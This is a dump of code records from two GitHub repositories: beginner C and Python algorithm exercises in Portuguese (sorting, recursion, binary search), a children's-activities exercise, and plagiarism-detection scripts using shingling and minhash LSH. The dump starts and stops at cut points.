true;}\n\telse\n\t{\n\t\tif (palavra[inicio] == palavra[fim])\n\t\t{\n\t\t\tinicio++;\n\t\t\treturn palindromo(palavra, inicio, fim);\n\t\t}\n\t\telse {return false;}\n\t}\n}\n\nint main(int argc, char const *argv[])\n{\n\tchar palavra[101];\n\tbool palindro;\n\tscanf(\"%[^\\n]\", palavra);\n\tpalindro = palindromo(palavra, 0, strlen(palavra));\n\tif (palindro == true){printf(\"É palindromo\\n\");}\n\telse {printf(\"Não é palindromo\\n\");}\n\treturn 0;\n}" }, { "alpha_fraction": 0.4739336371421814, "alphanum_fraction": 0.5545023679733276, "avg_line_length": 30.649999618530273, "blob_id": "d9e8a2a81a66b4e56b7168f0bfff43220eac2273", "content_id": "ac2669a4a03cfa38b32ca70e59ac82cfe3c20990", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 638, "license_type": "no_license", "max_line_length": 105, "num_lines": 20, "path": "/Busca Binária em Array.py", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "primos = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]\nmin = 1\nmax = int(len(primos)-1)\nnumero = int(input(\"Qual numero primo quer encontrar? \"))\nwhile True:\n media = (min + max)//2\n x = primos[media]\n if max < min:\n print('Valor não encontrado, {} não é primo'.format(numero))\n break\n elif numero == x:\n print('Valor encontrado no array, {} é primo'.format(primos[media]))\n break\n elif x < numero:\n print('buscando mais')\n min = media + 1\n else:\n print('buscando menos')\n max = media - 1\nprint('Parabéns!')\n" }, { "alpha_fraction": 0.6306068897247314, "alphanum_fraction": 0.6385224461555481, "avg_line_length": 16.272727966308594, "blob_id": "c71dac9cb081a6190238a243e85723ff692565e6", "content_id": "13923c10cf903c601eeb627a6adbb63886d560a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 380, "license_type": "no_license", "max_line_length": 65, "num_lines": 22, "path": "/Potencia Recursiva.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint potencia(int base, int expoente)\n{\n\tif (expoente == 1)\n\t{\n\t\treturn base;\n\t}\n\telse\n\t{\n\t\treturn base * potencia(base, expoente - 1);\n\t}\n}\n\nint main(int argc, char const *argv[])\n{\n\tint base, expoente;\n\tprintf(\"Insira a potencia e a base com um espaço entre eles\\n\");\n\tscanf(\"%d %d\", &base, &expoente);\n\tprintf(\"%d\\n\", potencia(base, expoente));\n\treturn 0;\n}" }, { "alpha_fraction": 0.6472663283348083, "alphanum_fraction": 0.6613756418228149, "avg_line_length": 39.5, "blob_id": "593598b160188b28bfc5b31e7a8302393b27d322", "content_id": "57701fc8d71c2a4230bde9e0b9018cdca1085d79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 573, "license_type": "no_license", "max_line_length": 77, "num_lines": 14, "path": "/Advinhação Binária.py", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "from random import randint\ncomputador = randint(1, 100)\nusuario = int(input('Qual número acha que o computador pensou, de 1 a 100?'))\nwhile True:\n if usuario == computador:\n print('Você advinhou, o numero pensado foi {}'.format(computador))\n break\n elif usuario < computador:\n print(f'Número digitado menor que o pensado')\n usuario = int(input('tente de novo: '))\n else:\n print(f'Número digitado maior que o pensado')\n usuario = int(input('digite novamente: '))\nprint(f'Só tenho duas palavras a dizer: Para, Béns!')\n" }, { "alpha_fraction": 0.4139534831047058, "alphanum_fraction": 0.42259135842323303, "avg_line_length": 22.169231414794922, "blob_id": "c0ad2003a5a4a7f2b3fa35000765bc79d17920c7", "content_id": "d5d0f1edf2e63f7fc209f10c5a650f1d901c1ed7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1506, "license_type": "no_license", "max_line_length": 106, "num_lines": 65, "path": "/Selection Sort Char.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h> \n#include <stdlib.h>\n#include <string.h>\n\nvoid sort_char(char *vetor, int entrada)\n{\n char troca, comparacao;\n int d = 0, tamanho;\n\n tamanho = strlen(vetor);\n \n while (d < tamanho)\n {\n if (entrada == 0)\n {\n comparacao = 'z';\n for (int i = d; vetor[i] != '\\0'; i++)\n {\n if (comparacao > vetor[i])\n {\n comparacao = vetor[i];\n\n troca = vetor[d];\n vetor[d] = comparacao;\n vetor[i] = troca; \n }\n }\n }\n else if (entrada == 1)\n {\n comparacao = 'a';\n for (int i = d; vetor[i] != '\\0'; i++)\n {\n if (comparacao < vetor[i])\n {\n comparacao = vetor[i];\n\n troca = vetor[d];\n vetor[d] = comparacao;\n vetor[i] = troca; \n }\n }\n }\n d++;\n }\n}\n \nint main(int argc, char const *argv[])\n{\n char vetor[101];\n int entrada;\n\n printf(\"Digite as letras que o vetor vai guardar\\n\");\n scanf(\"%[^\\n]\", vetor);\n\n printf(\"Digite a ordem, crescente 0 ou decrescente 1\\n\");\n scanf(\"%d\", &entrada); //usuario escolhe a ordem, 1 decrescente e 0 crescente, outros números nada faz\n \n sort_char(vetor, entrada);\n \n printf(\"Vetor ordenado\\n\");\n \n printf(\"%s\\n\", vetor);\n return 0;\n}" }, { "alpha_fraction": 0.619178056716919, "alphanum_fraction": 0.6356164216995239, "avg_line_length": 20.52941131591797, "blob_id": "0aebb4018d8fda7853c9167dfd143480f6fafaaf", "content_id": "0c2f4ce09a6cdecefa0888dbde9c790debcff9a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 366, "license_type": "no_license", "max_line_length": 62, "num_lines": 17, "path": "/Fatorial Recursivo.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint fatorial(int fator)\n{\n\tif (fator == 2){return 2;}\n\telse{return (fator * fatorial(fator - 1));}\n}\n\nint main(int argc, char const *argv[])\n{\n\tint fator, resultado;\n\tprintf(\"Qual número quer saber o fatorial?\\n\");\n\tscanf(\"%d\", &fator);\n\tif (fator <= 0){printf(\"1\\n\");}\n\telse{resultado = fatorial(fator); printf(\"%d\\n\", resultado);}\n\treturn 0;\n}" }, { "alpha_fraction": 0.57419353723526, "alphanum_fraction": 0.603225827217102, "avg_line_length": 17.294116973876953, "blob_id": "9f95f2324cce6be6a2d724270a53910e8e1f1b2f", "content_id": "10e0bed2ded8e9939d80ef4df8fe5ce0d4802fd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 310, "license_type": "no_license", "max_line_length": 56, "num_lines": 17, "path": "/Serie Aritmetica.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main(int argc, char const *argv[])\n{\n\tint entrada, serie_aritmetica;\n\tscanf(\"%d\", &entrada);\n\tif (entrada%2 == 0)\n\t{\n\t\tserie_aritmetica = (entrada + 1) * (entrada/2);\n\t}\n\telse\n\t{\n\t\tserie_aritmetica = (entrada + 1) * ((entrada/2)+ 0.5);\n\t}\n\tprintf(\"%d\\n\", serie_aritmetica);\n\treturn 0;\n}" }, { "alpha_fraction": 0.4121779799461365, "alphanum_fraction": 0.4449648857116699, "avg_line_length": 17.586956024169922, "blob_id": "325da51b7858bc091b26a70b39146be2b43a1489", "content_id": "038d0e67e893254030868df6d92258810f9ff80c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 855, "license_type": "no_license", "max_line_length": 66, "num_lines": 46, "path": "/Insertion Sort.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main(int argc, char const *argv[])\n{\n\tint array[101] = {3, 2, 4, 9, 6, 1}, entrada, tamanho, troca;\n\twhile(1)\n\t{\n\t\tprintf(\"Quer acrester um numero ao vetor? para não digite 0\\n\");\n\t\tscanf(\"%d\", &entrada);\n\t\tif (entrada == 0){break;}\n\t\telse\n\t\t{\n\t\t\ttamanho = 0;\n\t\t\tfor (int i = 0; array[i] != '\\0'; i++){tamanho++;}\n\t\t\tarray[tamanho + 1] = '\\0';\n\t\t\tarray[tamanho] = entrada;\n\n\t\t\tfor (int i = 1; array[i] != '\\0'; i++)\n\t\t\t{\n\t\t\t\tfor (int j = i; j > 0; j--)\n\t\t\t\t{\n\t\t\t\t\tif (array[j] < array[j - 1])\n\t\t\t\t\t{\n\t\t\t\t\t\ttroca = array[j];\n\t\t\t\t\t\tarray[j] = array[j - 1];\n\t\t\t\t\t\tarray[j - 1] = troca;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tprintf(\"(\");\n\t\t\tfor (int i = 0; array[i] != '\\0'; i++)\n\t\t\t{\n\t\t\t\tif (array[i + 1] == '\\0')\n\t\t\t\t{\n\t\t\t\t\tprintf(\"%d\", array[i]); \n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tprintf(\"%d, \", array[i]);\n\t\t\t\t}\n\t\t\t}\n\t\t\tprintf(\")\\n\");\n\t\t}\n\t}\n\treturn 0;\n}" } ]
10
sampita/Python_Activities_For_Kids
https://github.com/sampita/Python_Activities_For_Kids
b35cddadcb4672884adb3000207defa600a20a93
28a487cd4146f26432995a87daa568f85a61c985
4021a56b1cb681b69fb72da61ead491ea3f59bb2
refs/heads/master
2020-12-12T11:19:56.730313
2020-01-15T16:05:16
2020-01-15T16:05:16
234,115,472
0
0
null
2020-01-15T15:50:23
2020-01-15T15:51:16
2020-01-15T16:05:17
null
[ { "alpha_fraction": 0.6898989677429199, "alphanum_fraction": 0.6898989677429199, "avg_line_length": 30.967741012573242, "blob_id": "c1dfba8fcbcca410616c5f766c3cfc9b6660ec6e", "content_id": "766e4797573cb5b6b433ca0029e14a00e4466f20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 990, "license_type": "no_license", "max_line_length": 197, "num_lines": 31, "path": "/activitiesForKids.py", "repo_name": "sampita/Python_Activities_For_Kids", "src_encoding": "UTF-8", "text": "# Define four Python functions named run, swing, slide, and hide_and_seek. Each function should take a child's name as an argument. Each function should print that the child performed the activity.\ndef run(firstName):\n return {f'{firstName} runs fast'}\n\ndef swing(firstName):\n return {f'{firstName} swings high'}\n\ndef slide(firstName):\n return {f'{firstName} slides bravely'}\n\ndef hide_and_seek(firstName):\n return {f'{firstName} plays hide and seek'}\n\n# The following lists of children should be iterated, and the names sent to the appropriate functions.\n\nrunning_kids = [\"Pam\", \"Sam\", \"Andrea\", \"Will\"]\nswinging_kids = [\"Marybeth\", \"Jenna\", \"Kevin\", \"Courtney\"]\nsliding_kids = [\"Mike\", \"Jack\", \"Jennifer\", \"Earl\"]\nhiding_kids = [\"Henry\", \"Heather\", \"Hayley\", \"Hugh\"]\n\nfor kid in running_kids:\n print(run(kid))\n \nfor kid in swinging_kids:\n print(swing(kid))\n \nfor kid in sliding_kids:\n print(slide(kid))\n \nfor kid in hiding_kids:\n print(hide_and_seek(kid))" }, { "alpha_fraction": 0.7101669311523438, "alphanum_fraction": 0.7101669311523438, "avg_line_length": 46.14285659790039, "blob_id": "c4b76fff10946e8a6686f9bfe2d7151cf37f946a", "content_id": "761fae8083feaeb804e8fb6117955f8be4cbdf5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 659, "license_type": "no_license", "max_line_length": 203, "num_lines": 14, "path": "/README.md", "repo_name": "sampita/Python_Activities_For_Kids", "src_encoding": "UTF-8", "text": "# Python_Activities_For_Kids\n\n## Practice: Activities for Kids\nDefine four Python functions named `run`, `swing`, `slide`, and `hide_and_seek`. Each function should take a child's name as an argument. Each function should print that the child performed the activity.\n\nFor example, `Jay ran like a fool!` or `Chantelle slid down the slide!.`\n\nThe following lists of children should be iterated, and the names sent to the appropriate functions.\n\n```\nrunning_kids = [\"Pam\", \"Sam\", \"Andrea\", \"Will\"]\nswinging_kids = [\"Marybeth\", \"Jenna\", \"Kevin\", \"Courtney\"]\nsliding_kids = [\"Mike\", \"Jack\", \"Jennifer\", \"Earl\"]\nhiding_kids = [\"Henry\", \"Heather\", \"Hayley\", \"Hugh\"]" } ]
2
Ayush0406/Plaigarism-Checker
https://github.com/Ayush0406/Plaigarism-Checker
a7626276ec3d002ddb4154496f477932c7066a39
af98516a7b6fb0d5bee876eace2072666ba66959
db82914017ea1c4c924b306c3598125e8a18cd08
refs/heads/master
2020-08-31T19:52:29.670711
2019-10-31T13:53:10
2019-10-31T13:53:10
218,771,197
1
0
null
2019-10-31T13:21:59
2019-10-31T13:14:20
2019-10-31T13:14:18
null
[ { "alpha_fraction": 0.5315762162208557, "alphanum_fraction": 0.557002604007721, "avg_line_length": 30.2977352142334, "blob_id": "1fadceb098ae0cf3651c8b6ec827e0a04d974051", "content_id": "04dd1e54b350f557d8a83d7d364c4cf53ecd301d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9675, "license_type": "no_license", "max_line_length": 111, "num_lines": 309, "path": "/Shingles.py", "repo_name": "Ayush0406/Plaigarism-Checker", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nimport random\nimport math\nimport pandas as pd\n\n\ndef intersection(lst1, lst2):\n return set(lst1).intersection(lst2)\n\ndef union(lst1, lst2):\n final_list = lst1 + lst2\n return final_list\n\n\n#file1 = open(r\"C:\\Users\\medet\\Desktop\\Year3Sem1\\Information retrieval\\ir1.txt\", \"r\")\n#yourpath = r\"C:\\Users\\medet\\Desktop\\ir_files\"\n#\n#\n## for filename in os.listdir(os.getcwd()):\n#d = {}\n#shingle = {}\n#len_doc = 0\n#for files in os.listdir(yourpath):\n# #print(files)\n# with open(yourpath+'\\\\'+files, \"r\") as fileobj:\n# sh = []\n# for x in fileobj:\n# for i in range(0, len(x)-9):\n# sh.append(x[i:i+9:1])\n# if not x[i:i+9:1] in shingle:\n# shingle[x[i:i+9:1]] = [len_doc]\n# #global_shingle.append(x[i:i+9:1])\n# else:\n# shingle[x[i:i+9:1]].append(len_doc)\n# # print(sh)\n# d[len_doc] = sh\n# len_doc = len_doc + 1\n# # print(len_doc)\n \n\ndf = pd.read_csv('news_summary.csv', sep=',', encoding='latin-1')\nd = {}\nshingle = {}\nlen_doc = 0\n\nfor x in range(0, 20):\n string = df['ctext'][x]\n sh = []\n for i in range(0, len(string)-9):\n sh.append(string[i:i+9:1])\n if not string[i:i+9:1] in shingle:\n shingle[string[i:i+9:1]] = [len_doc]\n #global_shingle.append(x[i:i+9:1])\n else:\n shingle[string[i:i+9:1]].append(len_doc)\n d[len_doc] = sh\n len_doc += 1\n#print(d[5])\nprint(len_doc)\n\nfor key,value in shingle.items():\n list1 = set(value)\n shingle[key] = list(list1)\n\n\n# making the list obtained as value from 9-shingle key unique\nfor key, value in shingle.items():\n list1 = set(value)\n shingle[key] = list(list1)\n\n# printing modified shingle dictionary\n# print(\"printing modified shingle dictionary\")\n# for key, value in shingle.items():\n # print(key)\n # print(value)\n\n\n# doing random tests for correctness(to be deleted later)\n# print(d[1])\n# print(shingle[\"nment wil\"])\n# print(len(shingle))\n# print(finalArray)\nshin_hash = {}\nh = 0\nfor i in shingle:\n shin_hash[h] = i\n h = h + 1\n\n\n# building the input matrix\nfinalArray = np.zeros(shape=(len(shingle), len_doc))\ne = 0\nfor key, value in shingle.items():\n # print(value)\n for i in value:\n finalArray[e][i] = 1\n e = e + 1\n\n# print(finalArray[450:560])\n\n# building the signature matrix using hash functions\n\n# print(\"printing mul and add lists\")\n# initializing signature matrix and filling with infinity values\nsig_mat = np.zeros(shape = (100, len_doc))\nfor i in range(0,100):\n for j in range(0,len_doc):\n sig_mat[i][j] = 9999999\n\nprint(type(sig_mat))\n# building list that will be used for multiplication with x in hash function ax + b i.e. a\nmul_list = set(random.sample(range(0, 1000), 100))\nwhile(len(mul_list)<100):\n mul_list.append(random.sample(range(0, 1000), 1)[0])\nmul_list = list(mul_list)\nprint(mul_list)\n\n# building list that will be used for addition in h(x) in hash function ax + b i.e. b\nadd_list = set(random.sample(range(0, 1000), 100))\nwhile(len(add_list)<100):\n add_list.append(random.sample(range(0, 1000), 1)[0])\nadd_list = list(add_list)\nprint(add_list)\n\n# building 100 hash functions\nprint(\"printing signature matrix\")\nr2 = 0\nfor i in range(0, len(mul_list)):\n for k in range(0,len(shingle)):\n h = (int)(mul_list[i]*(k+1) + add_list[i])%(len(shingle))\n for l in range(0,len_doc):\n if finalArray[k][l] == 1:\n if sig_mat[r2][l] > h:\n sig_mat[r2][l] = h\n r2 = r2 + 1\n# print(sig_mat)\n\ndef cal_jaccard_score(sigmat,d1,d2):\n intersec = 0\n uni = 0\n for i in range(0,len(sigmat)):\n if sigmat[i][d1] == sigmat[i][d2]:\n intersec += 1\n uni = len(sigmat)\n return intersec/uni\n\ndef cal_cosine_score(sig_mat,d1,d2):\n mult = 0;\n mod_doc1 = 0;\n mod_doc2 = 0;\n for k in range(0, len(sig_mat)):\n mult = mult + sig_mat[k][d1] * sig_mat[k][d2]\n mod_doc1 = mod_doc1 + sig_mat[k][d1] * sig_mat[k][d1]\n mod_doc2 = mod_doc2 + sig_mat[k][d2] * sig_mat[k][d2]\n cosine_sim = mult / (math.sqrt(mod_doc1) * math.sqrt(mod_doc2))\n return cosine_sim\n\n\n\n\n\"\"\"def hash_signature(sig_mat, b, r):\n dictionary = list() # a list to store hashed buckets\n buckets = {} # a dictionary to store hashes of one band of size r rows\n print(\"entering hashSig\", b, r)\n startIndex = 0\n bands_done = 0\n for k in range(0, b): # iterating through each bands\n for i in range(0, len(sig_mat.T)): # iterating through each column given by transpose of sig_mat\n toCompress = '' # string to be compressed\n for j in range(startIndex, r + startIndex):\n print(j)\n toCompress += (str(int(sig_mat[j][i])))\n print(\"toCompress is \", toCompress)\n print(toCompress)\n bytesObject = bytes(toCompress.encode('latin-1'))\n c = Compressor()\n c.use_zlib()\n c.compress(toCompress, zlib_level=3)\n print(toCompress)\n startIndex += r\n # bands_done += 1\n\n# hash_signature(sig_mat, 15, 5)\n\"\"\"\ndictionary = list() # a list to store hashed buckets\ndef hash_signature2(sig_mat, b, r):\n print(\"entering hashSig\", b, r)\n startIndex = 0\n for k in range(0, b): # iterating through each bands\n buckets = {} # a dictionary to store hashes of one band of size r rows\n for i in range(0, len_doc): # iterating through each column given by transpose of sig_mat\n toCompress = '' # string to be compressed\n for j in range(startIndex, r + startIndex):\n #print(j)\n toCompress += (str(int(sig_mat[j][i])))\n if toCompress not in buckets:\n buckets[str(toCompress)] = [i]\n else:\n buckets[str(toCompress)].append(i)\n startIndex += r\n # bands_done += 1\n dictionary.append(buckets)\n print(\"printing list of hashtables\")\n e = 0;\n for i in dictionary:\n print(\"bucket\",e)\n for key, hash in i.items():\n print(key,hash)\n e += 1\n\n# hash_signature(sig_mat, 15, 5)5\n\ndef cal_jacc_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_jaccard_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_jaccard_score(sig_mat,hash[j],hash[k])\n #print(cal_jaccard_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\ndef cal_cosine_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_cosine_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_cosine_score(sig_mat,hash[j],hash[k])\n #print(cal_cosine_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\n# finding jaccard similarity between each pair of columns in original input matrix(finalArray)\nprint(\"printing similarity between rows\")\ncandidate_pairs = []\nfor i in range(0,len_doc):\n for j in range(i+1,len_doc):\n ori_int = 0\n ori_uni = 0\n sig_int = 0\n sig_uni = 0\n\n for k in range(0,len(shingle)):\n if finalArray[k][i] == 1 and finalArray[k][j] == 1:\n ori_int = ori_int + 1\n if finalArray[k][i] == 1 or finalArray[k][j] == 1:\n ori_uni = ori_uni + 1\n\n\n for k in range(0,100):\n if sig_mat[k][i] == sig_mat[k][j]:\n sig_int = sig_int + 1\n sig_uni = 100\n jacc_sim_ori = ori_int/ori_uni\n sig_sim_sig = sig_int/sig_uni\n if sig_sim_sig > 0.5:\n list1 = []\n list1.append(i+1)\n list1.append(j+1)\n candidate_pairs.append(list1)\n print(jacc_sim_ori)\n print(sig_sim_sig)\n print()\n# printing candidate pairs\nprint(\"printint candidate pairs\")\nprint(candidate_pairs)\n\nprint(\"\\n\\n\\n\\nprinting band candidate pairs\")\nnum_rows = 20\nall_can_pairs = {}\ns1 = []\ncnt = 0\nfor k in range(0,int(100/num_rows)):\n band_can_pairs = []\n for i in range(0,len_doc):\n for j in range(i + 1, len_doc):\n sig_band_int = 0\n for l in range(cnt, cnt + num_rows):\n if sig_mat[l][i] == sig_mat[l][j]:\n sig_band_int = sig_band_int + 1\n score = sig_band_int/num_rows\n if score > 0.6:\n set2 = []\n set2.append(i+1)\n set2.append(j+1)\n print(set2,score)\n band_can_pairs.append(set2)\n if set2 not in s1:\n s1.append(set2)\n cnt = cnt + num_rows\n all_can_pairs[k] = band_can_pairs\nprint(\"print ha ha ha\")\nprint(s1)\nprint(all_can_pairs)\n\nhash_signature2(sig_mat,20,5)\nprint(\"printing using jaccard\")\nprint(cal_jacc_score_candidate_pairs(0.2))\nprint(\"printing using cosine\")\nprint(cal_cosine_score_candidate_pairs(0.2))\n\n\n\n\n" }, { "alpha_fraction": 0.5526230335235596, "alphanum_fraction": 0.5781470537185669, "avg_line_length": 30.744827270507812, "blob_id": "ef0a54498e924ae7de3abe4bac6d50b4e1d91c33", "content_id": "58880a0e152b3189ad6c5ce4d3dff70a074d8c87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9207, "license_type": "no_license", "max_line_length": 114, "num_lines": 290, "path": "/Locality_sensitive_hashing.py", "repo_name": "Ayush0406/Plaigarism-Checker", "src_encoding": "UTF-8", "text": "import timeit\nimport pandas as pd\nimport numpy as np\nimport random\nimport math\n\nstart = timeit.default_timer()\n#files for storing the results\nf1 = open(\"ir_jacc_sim.txt\", 'w+')\nf2 = open(\"ir_sig_sim.txt\", 'w+')\nf3 = open(\"ir_sig_sim_band.txt\", 'w+')\nf4 = open(\"ir_cosine_sim.txt\", 'w+')\nf5 = open(\"ir_row_band_sim_scores.txt\", 'w+')\nf6 = open(\"ir_jacc_and_cosine_sim_using_string_hash.txt\", 'w+')\nf7 = open(\"ir_running_time.txt\", 'w+')\nf8 = open(\"ir_writing_hash_buckets.txt\", 'w+')\n#function to calculate jaccard score given two documents from the column vectors in\n#signature matrix\ndef cal_jaccard_score(sigmat,d1,d2):\n intersec = 0\n uni = 0\n for i in range(0,len(sigmat)):\n if sigmat[i][d1] == sigmat[i][d2]:\n intersec += 1\n uni = len(sigmat)\n return intersec/uni\n\n\n#function to calculate cosine score given two documents from the column vectors in\n#signature matrix\ndef cal_cosine_score(sig_mat,d1,d2):\n mult = 0;\n mod_doc1 = 0;\n mod_doc2 = 0;\n for k in range(0, len(sig_mat)):\n mult = mult + sig_mat[k][d1] * sig_mat[k][d2]\n mod_doc1 = mod_doc1 + sig_mat[k][d1] * sig_mat[k][d1]\n mod_doc2 = mod_doc2 + sig_mat[k][d2] * sig_mat[k][d2]\n cosine_sim = mult / (math.sqrt(mod_doc1) * math.sqrt(mod_doc2))\n return cosine_sim\n\n\ndictionary = list() # a list to store hashed buckets\n#This function is used to create hashbuckets for every band in the \n#signature matrix\ndef hash_signature2(sig_mat, b, r):\n print(\"entering hashSig\", b, r)\n startIndex = 0\n for k in range(0, b): # iterating through each bands\n buckets = {} # a dictionary to store hashes of one band of size r rows\n for i in range(0, len_doc): # iterating through each column given by transpose of sig_mat\n toCompress = '' # string to be compressed\n for j in range(startIndex, r + startIndex):\n #print(j)\n toCompress += (str(int(sig_mat[j][i])))\n if toCompress not in buckets:\n buckets[str(toCompress)] = [i]\n else:\n buckets[str(toCompress)].append(i)\n startIndex += r\n # bands_done += 1\n dictionary.append(buckets)\n \n\n\n#function to calculate candidate pairs using jaccard score\ndef cal_jacc_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_jaccard_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_jaccard_score(sig_mat,hash[j],hash[k])\n #print(cal_jaccard_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\n\n\n#function to calculate candidate pairs using cosine score\ndef cal_cosine_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_cosine_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_cosine_score(sig_mat,hash[j],hash[k])\n #print(cal_cosine_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\n\n#initializing variables\ndf = pd.read_csv('news_summary.csv', sep=',', encoding='latin-1')\nd = {}\nshingle = {}\nlen_doc = 0\n\n\n\n# making shingles of length 9\nfor x in range(0, 5):\n string = df['ctext'][x]\n sh = []\n for i in range(0, len(string)-9):\n sh.append(string[i:i+9:1])\n if not string[i:i+9:1] in shingle:\n shingle[string[i:i+9:1]] = [len_doc]\n #global_shingle.append(x[i:i+9:1])\n else:\n shingle[string[i:i+9:1]].append(len_doc)\n d[len_doc] = sh\n len_doc += 1\n \n\n\n# making the list obtained as value from 9-shingle key unique\nfor key,value in shingle.items():\n list1 = set(value)\n shingle[key] = list(list1)\n\n#print(shingle)\n\n\n#building the input matrix\nfinalArray = np.zeros(shape=(len(shingle), len_doc))\ne = 0\nfor key, value in shingle.items():\n #print(value)\n for i in value:\n finalArray[e][i] = 1\n e = e + 1\n\n#print(finalArray)\n\n\n#building the signature matrix using hash functions\n\n#initializing signature matrix and filling with infinity values\nsig_mat = np.zeros(shape = (100,len_doc))\nfor i in range(0,100):\n for j in range(0,len_doc):\n sig_mat[i][j] = 999999\n\n\n\n#building list that will be used for multiplication with x in hash function ax + b i.e. a\nmul_list = set(random.sample(range(0, 1000), 100))\nwhile(len(mul_list)<100):\n mul_list.append(random.sample(range(0, 1000), 1)[0])\nmul_list = list(mul_list)\n\n\n\n#building list that will be used for addition in h(x) in hash function ax + b i.e. b\nadd_list = set(random.sample(range(0, 1000), 100))\nwhile(len(add_list)<100):\n add_list.append(random.sample(range(0, 1000), 1)[0])\nadd_list = list(add_list)\n\n\n\n#building 100 hash functions\nprint(\"printing signature matrix\")\nr2 = 0\nfor i in range(0, len(mul_list)):\n for k in range(0,len(shingle)):\n h = (int)(mul_list[i]*(k+1) + add_list[i])%(len(shingle))\n for l in range(0,len_doc):\n if finalArray[k][l] == 1:\n if sig_mat[r2][l] > h:\n sig_mat[r2][l] = h\n r2 = r2 + 1\nprint(sig_mat)\n\n\n#finding jaccard similarity between each pair of columns in original input matrix(finalArray) and signature matrix\nprint(\"printing similarity between rows\")\ncandidate_pairs = []\nfor i in range(0,len_doc):\n for j in range(i+1,len_doc):\n ori_int = 0\n ori_uni = 0\n sig_int = 0\n sig_uni = 0\n \n #for cosine similarity-\n mult = 0;\n mod_doc1 = 0;\n mod_doc2 = 0;\n\n for k in range(0,len(shingle)):\n if finalArray[k][i] == 1 and finalArray[k][j] == 1:\n ori_int = ori_int + 1\n if finalArray[k][i] == 1 or finalArray[k][j] == 1:\n ori_uni = ori_uni + 1\n\n\n for k in range(0,100):\n if sig_mat[k][i] == sig_mat[k][j]:\n sig_int = sig_int + 1\n mult = mult + sig_mat[k][i] * sig_mat[k][j]\n mod_doc1 = mod_doc1 + sig_mat[k][i]*sig_mat[k][i]\n mod_doc2 = mod_doc2 + sig_mat[k][j]*sig_mat[k][j]\n cosine_sim = mult/(math.sqrt(mod_doc1) * math.sqrt(mod_doc2))\n sig_uni = 100\n jacc_sim_ori = ori_int/ori_uni\n sig_sim_sig = sig_int/sig_uni\n if sig_sim_sig > 0.2:\n list1 = []\n list1.append(i)\n list1.append(j)\n candidate_pairs.append(list1)\n f1.write(\"Jaccard Similarity between doc %d & %d : %f\\n\" %(i, j, jacc_sim_ori))\n f2.write(\"Signature Similarity between doc %d & %d : %f\\n\" %(i, j, sig_sim_sig))\n f4.write(\"Cosine Similarity between doc %d & %d : %f\\n\" %(i, j, cosine_sim))\n\n#printing candidate pairs\nprint(\"printing candidate pairs\")\nprint(candidate_pairs)\n\nprint(\"\\n\\nprinting band candidate pairs\")\nnum_rows = 20\nall_can_pairs = {}\ns1 = []\ncnt = 0\nfor k in range(0,int(100/num_rows)):\n band_can_pairs = []\n for i in range(0,len_doc):\n for j in range(i + 1, len_doc):\n sig_band_int = 0\n for l in range(cnt, cnt + num_rows):\n if sig_mat[l][i] == sig_mat[l][j]:\n sig_band_int = 